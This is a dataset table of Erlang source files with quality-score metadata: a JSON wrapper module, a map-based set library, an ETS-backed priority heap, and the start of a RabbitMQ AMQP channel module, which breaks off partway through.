code stringlengths 114 1.05M | path stringlengths 3 312 | quality_prob float64 0.5 0.99 | learning_prob float64 0.2 1 | filename stringlengths 3 168 | kind stringclasses 1 value |
|---|---|---|---|---|---|
%% -------------------------------------------------------------------
%%
%% Copyright (c) 2019 <NAME>. All Rights Reserved.
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% -------------------------------------------------------------------
%% @doc JSON Processing
-module(nklib_json).
-author('<NAME> <<EMAIL>>').
-export([encode/1, encode_pretty/1, encode_sorted/1, decode/1, json_ish/1]).
%% ===================================================================
%% Public
%% ===================================================================
%% @doc Encodes a term() to JSON
%% To use jiffy instead of jsone, include it as a dependency in you
%% application and it will be used automatically
-spec encode(term()) ->
binary() | error.
encode(Term) ->
Fun = fun() ->
case erlang:function_exported(jiffy, encode, 1) of
true ->
jiffy:encode(Term);
false ->
jsone:encode(Term)
end
end,
case nklib_util:do_try(Fun) of
{exception, {error, {Error, Trace}}} ->
lager:debug("Error encoding JSON: ~p (~p) (~p)", [Error, Term, Trace]),
error({json_encode_error, Error});
{exception, {throw, {Error, Trace}}} ->
lager:debug("Error encoding JSON: ~p (~p) (~p)", [Error, Term, Trace]),
error({json_encode_error, Error});
Other ->
Other
end.
%% @doc Encodes a term() to JSON
-spec encode_pretty(term()) ->
binary().
encode_pretty(Term) ->
Fun = fun() ->
case erlang:function_exported(jiffy, encode, 2) of
true ->
jiffy:encode(Term, [pretty]);
false ->
jsone:encode(Term, [{indent, 1}, {space, 2}])
end
end,
case nklib_util:do_try(Fun) of
{exception, {error, {Error, Trace}}} ->
lager:debug("Error encoding JSON: ~p (~p) (~p)", [Error, Term, Trace]),
error({json_encode_error, Error});
{exception, {throw, {Error, Trace}}} ->
lager:debug("Error encoding JSON: ~p (~p) (~p)", [Error, Term, Trace]),
error({json_encode_error, Error});
Other ->
Other
end.
%% @doc Encodes a term() to JSON sorting the keys
-spec encode_sorted(term()) ->
binary().
encode_sorted(Term) ->
encode_pretty(sort_json(Term)).
%% @private
sort_json(Map) when is_map(Map) ->
{[{Key, sort_json(Val)} || {Key, Val} <- lists:sort(maps:to_list(Map))]};
sort_json(List) when is_list(List) ->
[sort_json(Term) || Term <- List];
sort_json(Term) ->
Term.
%% @doc Decodes a JSON as a map
-spec decode(binary()|iolist()) ->
term().
decode(<<>>) ->
<<>>;
decode([]) ->
<<>>;
decode(Term) ->
Fun = fun() ->
case erlang:function_exported(jiffy, decode, 2) of
true ->
jiffy:decode(Term, [return_maps]);
false when is_binary(Term) ->
jsone:decode(Term);
false when is_list(Term) ->
jsone:decode(list_to_binary(Term))
end
end,
case nklib_util:do_try(Fun) of
{exception, {error, {Error, Trace}}} ->
lager:debug("Error decoding JSON: ~p (~p) (~p)", [Error, Term, Trace]),
error({json_decode_error, Error});
{exception, {throw, {Error, Trace}}} ->
lager:debug("Error decoding JSON: ~p (~p) (~p)", [Error, Term, Trace]),
error({json_decode_error, Error});
Other ->
Other
end.
%% @doc Makes a map json-ish (keys as binary, values as json)
json_ish(Map) ->
maps:fold(
fun(K, V, Acc) ->
V2 = if
is_binary(V); is_integer(V); is_float(V); is_boolean(V) ->
V;
V==null ->
V;
true ->
to_bin(V)
end,
Acc#{to_bin(K) => V2}
end,
#{},
Map).
%% @private
to_bin(T) when is_binary(T)-> T;
to_bin(T) -> nklib_util:to_binary(T). | src/nklib_json.erl | 0.555315 | 0.412826 | nklib_json.erl | starcoder |
%% s/sets/map_sets/g
%% Why? Because spead (This module piggybacks on `maps' module's BIFs)
-module(map_sets).
-export([ new/0
, is_set/1
, size/1
, to_list/1
, from_list/1
]).
-export([ is_element/2
, add_element/2
, del_element/2
]).
-export([ union/2
, union/1
, intersection/2
, intersection/1
]).
-export([ is_disjoint/2
]).
-export([ subtract/2
, is_subset/2
]).
-export([ fold/3
, filter/2
]).
-export_type([set/1, set/0]).
-type set(Key) :: #{Key => term()}.
-type set() :: set(term()).
-define(UNUSED, []).
-ifdef(OTP_RELEASE). %% OTP21+ supports map iterators
-define(iterable(A), maps:iterator(A)).
-define(iterate(I, Last, K, Next, Cons),
case maps:next(I) of
none -> Last;
{K, _, Next} -> Cons
end).
-else.
-define(iterable(A), maps:keys(A)).
-define(iterate(I, Last, K, Next, Cons),
case I of
[] -> Last;
[K|Next] -> Cons
end).
-endif.
-spec new() -> set().
new() ->
#{}.
-spec is_set(term()) -> boolean().
is_set(A) ->
is_map(A).
-spec size(set()) -> non_neg_integer().
size(A) ->
maps:size(A).
-spec fold(Function, Acc, Set) -> Acc when
Function :: fun((Element, Acc) -> Acc),
Set :: set(Element),
Acc :: term().
fold(Fun, A, B) ->
maps:fold( fun(K, _, Acc) -> Fun(K, Acc) end
, A
, B).
-spec filter(Predicate, Set) -> Set when
Predicate :: fun((Element) -> boolean()),
Set :: set(Element).
filter(P, A) ->
maps:filter( fun(K, _) -> P(K) end
, A).
-spec to_list(set(Elem)) -> [Elem].
to_list(A) ->
maps:keys(A).
-spec from_list([Elem]) -> set(Elem).
from_list(L) ->
maps:from_list([{I, ?UNUSED} || I <- L]).
-spec is_element(Elem, set(Elem)) -> boolean().
is_element(Elem, Set) ->
maps:is_key(Elem, Set).
-spec add_element(Elem, set(Elem)) -> set(Elem).
add_element(Elem, Set) ->
Set#{Elem => ?UNUSED}.
-spec del_element(Elem, set(Elem)) -> set(Elem).
del_element(Elem, Set) ->
maps:remove(Elem, Set).
-spec is_subset(set(Elem), set(Elem)) -> boolean().
is_subset(S1, S2) ->
is_subset_(?iterable(S1), S2).
is_subset_(Iter, S2) ->
?iterate(Iter,
true,
K, Next,
case maps:is_key(K, S2) of
true ->
is_subset_(Next, S2);
false ->
false
end).
-spec subtract(set(Elem), set(Elem)) -> set(Elem).
subtract(S1, S2) ->
maps:without(maps:keys(S2), S1).
-spec union(set(Elem), set(Elem)) -> set(Elem).
union(S1, S2) ->
maps:merge(S1, S2).
-spec union([set(Elem)]) -> set(Elem).
union(L) ->
lists:foldl(fun maps:merge/2, #{}, L).
-spec intersection(set(Elem), set(Elem)) -> set(Elem).
intersection(S1, S2) ->
case maps:size(S1) > maps:size(S2) of
true ->
intersection_(S1, S2);
false ->
intersection_(S2, S1)
end.
intersection_(Large, Small) ->
maps:fold( fun(E, _, Acc) ->
case maps:is_key(E, Large) of
true ->
Acc #{E => ?UNUSED};
_ ->
Acc
end
end
, #{}
, Small).
-spec intersection(nonempty_list(set(Elem))) -> set(Elem).
intersection([H|T]) ->
lists:foldl(fun intersection/2, H, T).
-spec is_disjoint(set(Elem), set(Elem)) -> boolean().
is_disjoint(S1, S2) ->
case maps:size(S1) > maps:size(S2) of
true ->
is_disjoint_(S1, ?iterable(S2));
false ->
is_disjoint_(S2, ?iterable(S1))
end.
is_disjoint_(Large, Small) ->
?iterate(Small,
true,
K, Next,
case maps:is_key(K, Large) of
true ->
false;
false ->
is_disjoint_(Large, Next)
end). | src/map_sets.erl | 0.504639 | 0.507507 | map_sets.erl | starcoder |
%% @doc Min-Heap, Max-Heap for Priority Queues
%%
%% <p>This module implements min-heaps and max-heaps for use in priority queues.
%% Each value in the heap is assosiated with a reference so that
%% the user can change its priority in O(log n).</p>
%%
%% <p>The implementation is based on ETS tables for the O(1) lookup time.
%% It supports all the basic heap operations:
%% <ul>
%% <li><code>min/1</code>, <code>max/1</code> in <em>O(1)</em></li>
%% <li><code>take_min/1</code>, <code>take_max/1</code> in <em>O(log n)</em></li>
%% <li><code>insert/2</code> in <em>O(log n)</em></li>
%% <li><code>update/3</code> in <em>O(log n)</em></li>
%% <li><code>from_list/2</code> in <em>O(n)</em></li>
%% </ul>
%% </p>
%%
%% <p>In order to achieve the above complexities the heap needs to store
%% an extra tuple <code>{Key, Reference}</code> for every
%% <code>Key</code> stored. In addition, the size of the heap is
%% stored as a tuple <code>{size, Size}</code>.</p>
%%
%% <p>For examples you can check the <code>heap_demo</code> module.</p>
%%
-module(heap).
-export([new/1, heap_size/1, is_empty/1, max/1, min/1, insert/2, delete/1,
take_min/1, take_max/1, update/3, from_list/2, to_list/1]).
-export_type([heap/0]).
%%
%% @type heap(). Min / Max Heap.
%%
-record(heap, {
mode :: mode(),
htab :: ets:tab()
}).
-type heap() :: #heap{}.
-type mode() :: max | min.
-type refterm() :: {term(), reference()}.
%% =======================================================================
%% External Exports
%% =======================================================================
%% @doc Returns a list of the terms in a heap.
-spec to_list(heap()) -> [term()].
to_list(H) ->
L = ets:tab2list(H#heap.htab),
M = fun(A) ->
case A of
{_, {X, _}} -> {true, X};
_ -> false
end
end,
lists:filtermap(M, L).
%% @doc Creates an empty heap.
%% <p>If <code>M</code> is <code>max</code> then it will be a max heap,
%% else if <code>M</code> is <code>min</code> it will be a min heap.</p>
-spec new(mode()) -> heap().
new(M) when M =:= max; M=:= min ->
H = ets:new(?MODULE, [ordered_set, public]),
ets:insert(H, {size, 0}),
#heap{mode=M, htab=H};
new(_Mode) ->
erlang:error(badarg).
%% @doc Deletes a heap.
-spec delete(heap()) -> true.
delete(H) -> ets:delete(H#heap.htab).
%% @doc Returns the number of elements contained in a heap.
-spec heap_size(heap()) -> non_neg_integer().
heap_size(H) ->
[{size, Len}] = ets:lookup(H#heap.htab, size),
Len.
%% @doc Checks whether a heap is empty or not.
-spec is_empty(heap()) -> boolean().
is_empty(H) -> heap_size(H) =:= 0.
%% @doc Returns the element of a max heap with the maximum priority.
%% <p>If it is a min heap, it returns <code>{error, min_heap}</code>.</p>
-spec max(heap()) -> term() | {error, min_heap | empty_heap}.
max(H) when H#heap.mode =:= max ->
case ets:lookup(H#heap.htab, 1) of
[] -> {error, empty_heap};
[{1, {Max, _Ref}}] -> Max
end;
max(_H) -> {error, min_heap}.
%% @doc Returns the element of a min heap with the minimum priority.
%% <p>If it is a max heap, it returns <code>{error, max_heap}</code>.</p>
-spec min(heap()) -> term() | {error, max_heap | empty_heap}.
min(H) when H#heap.mode =:= min ->
case ets:lookup(H#heap.htab, 1) of
[] -> {error, empty_heap};
[{1, {Min, _Ref}}] -> Min
end;
min(_H) -> {error, max_heap}.
%% @doc Add a new element to a heap.
%% <p>It returns a tuple with the element added and a reference
%% so that one can change its priority.</p>
-spec insert(heap(), term()) -> refterm().
insert(H, X) ->
HS = heap_size(H),
HS_n = HS + 1,
Ref = erlang:make_ref(),
ets:insert(H#heap.htab, {HS_n, {X, Ref}}),
ets:insert(H#heap.htab, {Ref, HS_n}),
ets:insert(H#heap.htab, {size, HS_n}),
I = HS_n,
P = I div 2,
insert_loop(H, I, P),
{X, Ref}.
%% @doc Removes and returns the maximum priority element of a max heap.
-spec take_max(heap()) -> term() | {error, min_heap | empty_heap}.
take_max(H) when H#heap.mode =:= max -> pop(H);
take_max(_H) -> {error, min_heap}.
%% @doc Removes and returns the minimum priority element of a min heap.
-spec take_min(heap()) -> term() | {error, max_heap | empty_heap}.
take_min(H) when H#heap.mode =:= min -> pop(H);
take_min(_H) -> {error, max_heap}.
%% Deletes and returns the element at the top of the heap
%% and re-arranges the rest of the heap
-spec pop(heap()) -> term().
pop(H) ->
case ets:lookup(H#heap.htab, 1) of
[] -> {error, empty_heap};
[{1, {Head, RefHead}}] ->
HS = heap_size(H),
[{HS, {X, RefX}}] = ets:lookup(H#heap.htab, HS),
ets:delete(H#heap.htab, HS), %% Can be commented
ets:delete(H#heap.htab, RefHead), %% Can be commented
HS_n = HS - 1,
ets:insert(H#heap.htab, {size, HS_n}),
case HS_n =:= 0 of %% Can be commented
true -> ok; %% Can be commented
false -> %% Can be commented
ets:insert(H#heap.htab, {1, {X, RefX}}),
ets:insert(H#heap.htab, {RefX, 1})
end, %% Can be commented
combine(H, 1, HS_n),
Head
end.
%% @doc Change the priority of an element.
%% <p>It changes the priority of the element referenced with
%% <code>Ref</code> to <code>Value</code> and then re-arranges the heap.</p>
-spec update(heap(), reference(), term()) -> true.
update(H, Ref, X) ->
case ets:lookup(H#heap.htab, Ref) of
[] -> true;
[{Ref, I}] ->
[{I, {OldX, Ref}}] = ets:lookup(H#heap.htab, I),
case {X > OldX, H#heap.mode} of
{true, max} -> up_heapify(H, I, X, Ref);
{false, min} -> up_heapify(H, I, X, Ref);
{false, max} -> down_heapify(H, I, X, Ref);
{true, min} -> down_heapify(H, I, X, Ref)
end,
true
end.
%% @doc Create a heap from a list of terms.
%% <p>It returns the heap and a list of tuples <code>{Key, Ref}</code>
%% where <code>Key</code> is the term that was added and <code>Ref</code>
%% is its reference (used to change its priority).</p>
-spec from_list(mode(), [term()]) -> {heap(), [refterm()]}.
from_list(M, L) when is_list(L), is_atom(M) ->
HS = erlang:length(L),
{H, Rs} = ets_from_elements(M, L, HS),
I = HS div 2,
construct_heap(H, I, HS),
{H, Rs};
from_list(_M, _L) ->
erlang:error(badarg).
%% =======================================================================
%% Internal Functions
%% =======================================================================
%% Re-arranges the heap in a bottom-up manner
-spec insert_loop(heap(), pos_integer(), pos_integer()) -> ok.
insert_loop(H, I, P) when I > 1 ->
[{I, {X, _RefX}}] = ets:lookup(H#heap.htab, I),
[{P, {Y, _RefY}}] = ets:lookup(H#heap.htab, P),
case {Y < X, H#heap.mode} of
{true, max} ->
swap(H, P, I),
NI = P,
NP = NI div 2,
insert_loop(H, NI, NP);
{false, min} ->
swap(H, P, I),
NI = P,
NP = NI div 2,
insert_loop(H, NI, NP);
{_, _} -> ok
end;
insert_loop(_H, _I, _P) -> ok.
-spec up_heapify(heap(), pos_integer(), term(), reference()) -> ok.
up_heapify(H, I, X, Ref) ->
ets:insert(H#heap.htab, {I, {X, Ref}}),
P = I div 2,
insert_loop(H, I, P).
%% Re-arranges the heap in a top-down manner
-spec combine(heap(), pos_integer(), pos_integer()) -> ok.
combine(H, I, HS) ->
L = 2*I,
R = 2*I + 1,
MP = I,
MP_L = combine_h1(H, L, MP, HS),
MP_R = combine_h1(H, R, MP_L, HS),
combine_h2(H, MP_R, I, HS).
-spec combine_h1(heap(), pos_integer(), pos_integer(), pos_integer()) -> pos_integer().
combine_h1(H, W, MP, HS) when W =< HS ->
[{W, {X, _RefX}}] = ets:lookup(H#heap.htab, W),
[{MP, {Y, _RefY}}] = ets:lookup(H#heap.htab, MP),
case {X > Y, H#heap.mode} of
{true, max} -> W;
{false, min} -> W;
{_, _} -> MP
end;
combine_h1(_H, _W, MP, _HS) -> MP.
-spec combine_h2(heap(), pos_integer(), pos_integer(), pos_integer()) -> ok.
combine_h2(_H, MP, I, _HS) when MP =:= I -> ok;
combine_h2(H, MP, I, HS) ->
swap(H, I, MP),
combine(H, MP, HS).
-spec down_heapify(heap(), pos_integer(), term(), reference()) -> ok.
down_heapify(H, I, X, Ref) ->
ets:insert(H#heap.htab, {I, {X, Ref}}),
HS = heap_size(H),
combine(H, I, HS).
%% Swaps two elements of the heap
-spec swap(heap(), pos_integer(), pos_integer()) -> true.
swap(H, I, J) ->
[{I, {X, RX}}] = ets:lookup(H#heap.htab, I),
[{J, {Y, RY}}] = ets:lookup(H#heap.htab, J),
ets:insert(H#heap.htab, {I, {Y, RY}}),
ets:insert(H#heap.htab, {RY, I}),
ets:insert(H#heap.htab, {J, {X, RX}}),
ets:insert(H#heap.htab, {RX, J}).
%% Used for constructing a heap from a list
-spec construct_heap(heap(), pos_integer(), pos_integer()) -> ok.
construct_heap(H, I, HS) when I > 0 ->
combine(H, I, HS),
construct_heap(H, I-1, HS);
construct_heap(_H, _I, _HS) -> ok.
-spec ets_from_elements(mode(), [term()], non_neg_integer()) -> {heap(), [refterm()]}.
ets_from_elements(M, L, HS) ->
H = new(M),
ets:insert(H#heap.htab, {size, HS}),
Rs = add_elements(H, L, 1, []),
{H, Rs}.
-spec add_elements(heap(), [term()], pos_integer(), [refterm()]) -> [refterm()].
add_elements(_H, [], _N, Acc) ->
lists:reverse(Acc);
add_elements(H, [T|Ts], N, Acc) ->
Ref = erlang:make_ref(),
ets:insert(H#heap.htab, {N, {T, Ref}}),
ets:insert(H#heap.htab, {Ref, N}),
add_elements(H, Ts, N+1, [{T, Ref}|Acc]). | src/heap.erl | 0.63861 | 0.509398 | heap.erl | starcoder |
%% This Source Code Form is subject to the terms of the Mozilla Public
%% License, v. 2.0. If a copy of the MPL was not distributed with this
%% file, You can obtain one at https://mozilla.org/MPL/2.0/.
%%
%% Copyright (c) 2007-2020 VMware, Inc. or its affiliates. All rights reserved.
%%
%% @type close_reason(Type) = {shutdown, amqp_reason(Type)}.
%% @type amqp_reason(Type) = {Type, Code, Text}
%% Code = non_neg_integer()
%% Text = binary().
%% @doc This module encapsulates the client's view of an AMQP
%% channel. Each server side channel is represented by an amqp_channel
%% process on the client side. Channel processes are created using the
%% {@link amqp_connection} module. Channel processes are supervised
%% under amqp_client's supervision tree.<br/>
%% <br/>
%% In case of a failure or an AMQP error, the channel process exits with a
%% meaningful exit reason:<br/>
%% <br/>
%% <table>
%% <tr>
%% <td><strong>Cause</strong></td>
%% <td><strong>Exit reason</strong></td>
%% </tr>
%% <tr>
%% <td>Any reason, where Code would have been 200 otherwise</td>
%% <td>```normal'''</td>
%% </tr>
%% <tr>
%% <td>User application calls amqp_channel:close/3</td>
%% <td>```close_reason(app_initiated_close)'''</td>
%% </tr>
%% <tr>
%% <td>Server closes channel (soft error)</td>
%% <td>```close_reason(server_initiated_close)'''</td>
%% </tr>
%% <tr>
%% <td>Server misbehaved (did not follow protocol)</td>
%% <td>```close_reason(server_misbehaved)'''</td>
%% </tr>
%% <tr>
%% <td>Connection is closing (causing all channels to cleanup and
%% close)</td>
%% <td>```{shutdown, {connection_closing, amqp_reason(atom())}}'''</td>
%% </tr>
%% <tr>
%% <td>Other error</td>
%% <td>(various error reasons, causing more detailed logging)</td>
%% </tr>
%% </table>
%% <br/>
%% See type definitions below.
-module(amqp_channel).
-include("amqp_client_internal.hrl").
-behaviour(gen_server).
-export([call/2, call/3, cast/2, cast/3, cast_flow/3]).
-export([close/1, close/3]).
-export([register_return_handler/2, unregister_return_handler/1,
register_flow_handler/2, unregister_flow_handler/1,
register_confirm_handler/2, unregister_confirm_handler/1]).
-export([call_consumer/2, subscribe/3]).
-export([next_publish_seqno/1, wait_for_confirms/1, wait_for_confirms/2,
wait_for_confirms_or_die/1, wait_for_confirms_or_die/2]).
-export([start_link/5, set_writer/2, connection_closing/3, open/1,
enable_delivery_flow_control/1, notify_received/1]).
-export([init/1, terminate/2, code_change/3, handle_call/3, handle_cast/2,
handle_info/2]).
-define(TIMEOUT_FLUSH, 60000).
-record(state, {number,
connection,
consumer,
driver,
rpc_requests = queue:new(),
closing = false, %% false |
%% {just_channel, Reason} |
%% {connection, Reason}
writer,
return_handler = none,
confirm_handler = none,
next_pub_seqno = 0,
flow_active = true,
flow_handler = none,
unconfirmed_set = gb_sets:new(),
waiting_set = gb_trees:empty(),
only_acks_received = true,
%% true | false, only relevant in the direct
%% client case.
%% when true, consumers will manually notify
%% queue pids using rabbit_amqqueue_common:notify_sent/2
%% to prevent the queue from overwhelming slow
%% consumers that use automatic acknowledgement
%% mode.
delivery_flow_control = false
}).
%%---------------------------------------------------------------------------
%% Type Definitions
%%---------------------------------------------------------------------------
%% @type amqp_method().
%% This abstract datatype represents the set of methods that comprise
%% the AMQP execution model. As indicated in the overview, the
%% attributes of each method in the execution model are described in
%% the protocol documentation. The Erlang record definitions are
%% autogenerated from a parseable version of the specification. Most
%% fields in the generated records have sensible default values that
%% you need not worry in the case of a simple usage of the client
%% library.
%% @type amqp_msg() = #amqp_msg{}.
%% This is the content encapsulated in content-bearing AMQP methods. It
%% contains the following fields:
%% <ul>
%% <li>props :: class_property() - A class property record, defaults to
%% #'P_basic'{}</li>
%% <li>payload :: binary() - The arbitrary data payload</li>
%% </ul>
%%---------------------------------------------------------------------------
%% AMQP Channel API methods
%%---------------------------------------------------------------------------
%% @spec (Channel, Method) -> Result
%% @doc This is equivalent to amqp_channel:call(Channel, Method, none).
call(Channel, Method) ->
gen_server:call(Channel, {call, Method, none, self()}, amqp_util:call_timeout()).
%% @spec (Channel, Method, Content) -> Result
%% where
%% Channel = pid()
%% Method = amqp_method()
%% Content = amqp_msg() | none
%% Result = amqp_method() | ok | blocked | closing
%% @doc This sends an AMQP method on the channel.
%% For content bearing methods, Content has to be an amqp_msg(), whereas
%% for non-content bearing methods, it needs to be the atom 'none'.<br/>
%% In the case of synchronous methods, this function blocks until the
%% corresponding reply comes back from the server and returns it.
%% In the case of asynchronous methods, the function blocks until the method
%% gets sent on the wire and returns the atom 'ok' on success.<br/>
%% This will return the atom 'blocked' if the server has
%% throttled the client for flow control reasons. This will return the
%% atom 'closing' if the channel is in the process of shutting down.<br/>
%% Note that for asynchronous methods, the synchronicity implied by
%% 'call' only means that the client has transmitted the method to
%% the broker. It does not necessarily imply that the broker has
%% accepted responsibility for the message.
call(Channel, Method, Content) ->
gen_server:call(Channel, {call, Method, Content, self()}, amqp_util:call_timeout()).
%% @spec (Channel, Method) -> ok
%% @doc This is equivalent to amqp_channel:cast(Channel, Method, none).
cast(Channel, Method) ->
gen_server:cast(Channel, {cast, Method, none, self(), noflow}).
%% @spec (Channel, Method, Content) -> ok
%% where
%% Channel = pid()
%% Method = amqp_method()
%% Content = amqp_msg() | none
%% @doc This function is the same as {@link call/3}, except that it returns
%% immediately with the atom 'ok', without blocking the caller process.
%% This function is not recommended with synchronous methods, since there is no
%% way to verify that the server has received the method.
cast(Channel, Method, Content) ->
gen_server:cast(Channel, {cast, Method, Content, self(), noflow}).
%% @spec (Channel, Method, Content) -> ok
%% where
%% Channel = pid()
%% Method = amqp_method()
%% Content = amqp_msg() | none
%% @doc Like cast/3, with flow control.
cast_flow(Channel, Method, Content) ->
credit_flow:send(Channel),
gen_server:cast(Channel, {cast, Method, Content, self(), flow}).
%% @spec (Channel) -> ok | closing
%% where
%% Channel = pid()
%% @doc Closes the channel, invokes
%% close(Channel, 200, <<"Goodbye">>).
close(Channel) ->
close(Channel, 200, <<"Goodbye">>).
%% @spec (Channel, Code, Text) -> ok | closing
%% where
%% Channel = pid()
%% Code = integer()
%% Text = binary()
%% @doc Closes the channel, allowing the caller to supply a reply code and
%% text. If the channel is already closing, the atom 'closing' is returned.
close(Channel, Code, Text) ->
gen_server:call(Channel, {close, Code, Text}, amqp_util:call_timeout()).
%% @spec (Channel) -> integer()
%% where
%% Channel = pid()
%% @doc When in confirm mode, returns the sequence number of the next
%% message to be published.
next_publish_seqno(Channel) ->
gen_server:call(Channel, next_publish_seqno, amqp_util:call_timeout()).
%% @spec (Channel) -> boolean() | 'timeout'
%% where
%% Channel = pid()
%% @doc Wait until all messages published since the last call have
%% been either ack'd or nack'd by the broker. Note, when called on a
%% non-Confirm channel, waitForConfirms returns an error.
wait_for_confirms(Channel) ->
wait_for_confirms(Channel, amqp_util:call_timeout()).
%% @spec (Channel, Timeout) -> boolean() | 'timeout'
%% where
%% Channel = pid()
%% Timeout = non_neg_integer() | 'infinity'
%% @doc Wait until all messages published since the last call have
%% been either ack'd or nack'd by the broker or the timeout expires.
%% Note, when called on a non-Confirm channel, waitForConfirms throws
%% an exception.
wait_for_confirms(Channel, Timeout) ->
case gen_server:call(Channel, {wait_for_confirms, Timeout}, amqp_util:call_timeout()) of
{error, Reason} -> throw(Reason);
Other -> Other
end.
%% @spec (Channel) -> true
%% where
%% Channel = pid()
%% @doc Behaves the same as wait_for_confirms/1, but if a nack is
%% received, the calling process is immediately sent an
%% exit(nack_received).
wait_for_confirms_or_die(Channel) ->
wait_for_confirms_or_die(Channel, amqp_util:call_timeout()).
%% @spec (Channel, Timeout) -> true
%% where
%% Channel = pid()
%% Timeout = non_neg_integer() | 'infinity'
%% @doc Behaves the same as wait_for_confirms/1, but if a nack is
%% received, the calling process is immediately sent an
%% exit(nack_received). If the timeout expires, the calling process is
%% sent an exit(timeout).
wait_for_confirms_or_die(Channel, Timeout) ->
case wait_for_confirms(Channel, Timeout) of
timeout -> close(Channel, 200, <<"Confirm Timeout">>),
exit(timeout);
false -> close(Channel, 200, <<"Nacks Received">>),
exit(nacks_received);
true -> true
end.
%% @spec (Channel, ReturnHandler) -> ok
%% where
%% Channel = pid()
%% ReturnHandler = pid()
%% @doc This registers a handler to deal with returned messages. The
%% registered process will receive #basic.return{} records.
register_return_handler(Channel, ReturnHandler) ->
gen_server:cast(Channel, {register_return_handler, ReturnHandler} ).
%% @spec (Channel) -> ok
%% where
%% Channel = pid()
%% @doc Removes the return handler, if it exists. Does nothing if there is no
%% such handler.
unregister_return_handler(Channel) ->
gen_server:cast(Channel, unregister_return_handler).
%% @spec (Channel, ConfirmHandler) -> ok
%% where
%% Channel = pid()
%% ConfirmHandler = pid()
%% @doc This registers a handler to deal with confirm-related
%% messages. The registered process will receive #basic.ack{} and
%% #basic.nack{} commands.
register_confirm_handler(Channel, ConfirmHandler) ->
gen_server:cast(Channel, {register_confirm_handler, ConfirmHandler} ).
%% @spec (Channel) -> ok
%% where
%% Channel = pid()
%% @doc Removes the confirm handler, if it exists. Does nothing if there is no
%% such handler.
unregister_confirm_handler(Channel) ->
gen_server:cast(Channel, unregister_confirm_handler).
%% @spec (Channel, FlowHandler) -> ok
%% where
%% Channel = pid()
%% FlowHandler = pid()
%% @doc This registers a handler to deal with channel flow notifications.
%% The registered process will receive #channel.flow{} records.
register_flow_handler(Channel, FlowHandler) ->
gen_server:cast(Channel, {register_flow_handler, FlowHandler} ).
%% @spec (Channel) -> ok
%% where
%% Channel = pid()
%% @doc Removes the flow handler, if it exists. Does nothing if there is no
%% such handler.
unregister_flow_handler(Channel) ->
gen_server:cast(Channel, unregister_flow_handler).
%% @spec (Channel, Msg) -> ok
%% where
%% Channel = pid()
%% Msg = any()
%% @doc This causes the channel to invoke Consumer:handle_call/2,
%% where Consumer is the amqp_gen_consumer implementation registered with
%% the channel.
call_consumer(Channel, Msg) ->
gen_server:call(Channel, {call_consumer, Msg}, amqp_util:call_timeout()).
%% @spec (Channel, BasicConsume, Subscriber) -> ok
%% where
%% Channel = pid()
%% BasicConsume = amqp_method()
%% Subscriber = pid()
%% @doc Subscribe the given pid to a queue using the specified
%% basic.consume method.
subscribe(Channel, BasicConsume = #'basic.consume'{}, Subscriber) ->
gen_server:call(Channel, {subscribe, BasicConsume, Subscriber}, amqp_util:call_timeout()).
%%---------------------------------------------------------------------------
%% Internal interface
%%---------------------------------------------------------------------------
%% @private
start_link(Driver, Connection, ChannelNumber, Consumer, Identity) ->
gen_server:start_link(
?MODULE, [Driver, Connection, ChannelNumber, Consumer, Identity], []).
set_writer(Pid, Writer) ->
gen_server:cast(Pid, {set_writer, Writer}).
enable_delivery_flow_control(Pid) ->
gen_server:cast(Pid, enable_delivery_flow_control).
notify_received({Pid, QPid, ServerChPid}) ->
gen_server:cast(Pid, {send_notify, {QPid, ServerChPid}}).
%% @private
connection_closing(Pid, ChannelCloseType, Reason) ->
gen_server:cast(Pid, {connection_closing, ChannelCloseType, Reason}).
%% @private
open(Pid) ->
gen_server:call(Pid, open, amqp_util:call_timeout()).
%%---------------------------------------------------------------------------
%% gen_server callbacks
%%---------------------------------------------------------------------------
%% @private
init([Driver, Connection, ChannelNumber, Consumer, Identity]) ->
?store_proc_name(Identity),
{ok, #state{connection = Connection,
driver = Driver,
number = ChannelNumber,
consumer = Consumer}}.
%% @private
handle_call(open, From, State) ->
{noreply, rpc_top_half(#'channel.open'{}, none, From, none, noflow, State)};
%% @private
handle_call({close, Code, Text}, From, State) ->
handle_close(Code, Text, From, State);
%% @private
handle_call({call, Method, AmqpMsg, Sender}, From, State) ->
handle_method_to_server(Method, AmqpMsg, From, Sender, noflow, State);
%% Handles the delivery of messages from a direct channel
%% @private
handle_call({send_command_sync, Method, Content}, From, State) ->
Ret = handle_method_from_server(Method, Content, State),
gen_server:reply(From, ok),
Ret;
%% Handles the delivery of messages from a direct channel
%% @private
handle_call({send_command_sync, Method}, From, State) ->
Ret = handle_method_from_server(Method, none, State),
gen_server:reply(From, ok),
Ret;
%% @private
handle_call(next_publish_seqno, _From,
State = #state{next_pub_seqno = SeqNo}) ->
{reply, SeqNo, State};
handle_call({wait_for_confirms, Timeout}, From, State) ->
handle_wait_for_confirms(From, Timeout, State);
%% @private
handle_call({call_consumer, Msg}, _From,
State = #state{consumer = Consumer}) ->
{reply, amqp_gen_consumer:call_consumer(Consumer, Msg), State};
%% @private
handle_call({subscribe, BasicConsume, Subscriber}, From, State) ->
handle_method_to_server(BasicConsume, none, From, Subscriber, noflow,
State).
%% @private
handle_cast({set_writer, Writer}, State = #state{driver = direct}) ->
link(Writer),
{noreply, State#state{writer = Writer}};
handle_cast({set_writer, Writer}, State) ->
{noreply, State#state{writer = Writer}};
%% @private
handle_cast(enable_delivery_flow_control, State) ->
{noreply, State#state{delivery_flow_control = true}};
%% @private
handle_cast({send_notify, {QPid, ChPid}}, State) ->
rabbit_amqqueue_common:notify_sent(QPid, ChPid),
{noreply, State};
%% @private
handle_cast({cast, Method, AmqpMsg, Sender, noflow}, State) ->
handle_method_to_server(Method, AmqpMsg, none, Sender, noflow, State);
handle_cast({cast, Method, AmqpMsg, Sender, flow}, State) ->
credit_flow:ack(Sender),
handle_method_to_server(Method, AmqpMsg, none, Sender, flow, State);
%% @private
handle_cast({register_return_handler, ReturnHandler}, State) ->
Ref = erlang:monitor(process, ReturnHandler),
{noreply, State#state{return_handler = {ReturnHandler, Ref}}};
%% @private
handle_cast(unregister_return_handler,
